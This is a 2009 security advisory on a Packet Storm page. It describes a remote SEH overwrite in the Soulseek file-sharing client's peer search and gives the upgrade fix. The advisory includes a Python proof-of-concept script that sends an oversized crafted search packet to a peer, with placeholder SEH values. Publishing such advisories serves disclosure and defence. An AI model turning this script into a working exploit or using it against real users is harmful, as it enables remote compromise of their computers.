exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Soulseek 157 NS SEH Overwrite

Soulseek 157 NS SEH Overwrite
Posted Jul 3, 2009
Authored by laurent gaffie

Soulseek versions 157 NS below 13e and all versions of 156 suffer from a remote peer search code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | f4dc93b0e17e9d360d0c68d40d4e75142ee147a08f18dd69e8e6d31951a951dc

Soulseek 157 NS SEH Overwrite

Change Mirror Download
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
=============================================
- Release date: July 02, 2009
- Discovered by: Laurent GaffiƩ ; http://g-laurent.blogspot.com/
- Severity: critical
=============================================

I. VULNERABILITY
-------------------------
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution

II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people
with
the same interests, share information, and chat freely using real-time
messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to
make
new friends and expand your mind!"

III. DESCRIPTION
-------------------------
Soulseek client allows direct peer file search, allowing a user to find the
files he wants directly on the
peer computer.
Unfortunatly this feature is vulnerable to a remote SEH overwrite.

IV. PROOF OF CONCEPT
-------------------------
This proof of concept will target a user called 123yow123.

import struct
import sys, socket
from time import *

ip = "IP_ADDR"
port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip,port))
except:
print "Can\'t connect to peer!\n"
sys.exit(0)

junk = "\x41" * 3084
next_seh = struct.pack('<L', 0x42424242)
seh = struct.pack('<L', 0x43434343)
other_junk = "\x61" * 1424

buffer = "\x17\x00\x00\x00\x01\x09\x00\x00\x00\x31\x32\x33\x79\x6f\x77\x31"
buffer+= "\x32\x33\x01\x00\x00\x00\x50\x00\x00\x00\x00\x21\x0c\x00\x00\x08"
buffer+=
"\x00\x00\x00\x6c\x7b\x1d\x0c\x15\x0c\x00\x00"+junk+next_seh+seh+other_junk

s.send(buffer)


After the query is send, the SEH handler will get overwriten.


V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any prior to 157
NS 13e Soulseek client

VI. SYSTEMS AFFECTED
-------------------------
Windows all versions

VII. SOLUTION
-------------------------
Upgrade to 157 NS 13e
(http://slsknet.org/download.html)

VIII. REFERENCES
-------------------------
http://www.slsknet.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent GaffiƩ
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-------------------------
july 02, 2009

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII. PERSONAL NOTES
------------------------
Souleek team as patched this bug month ago, a distributed message urging
users to upgrade them Soulseek client
is still send since a month, and not much users still use vulnerable
Soulseek versions.
@to the one who like to rip bugs and make an exploit ""universal"" for fame,
just make sure it's at least
universal before you say so.
For the others : http://www.youtube.com/watch?v=tVACUjHn6yU :)

@RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close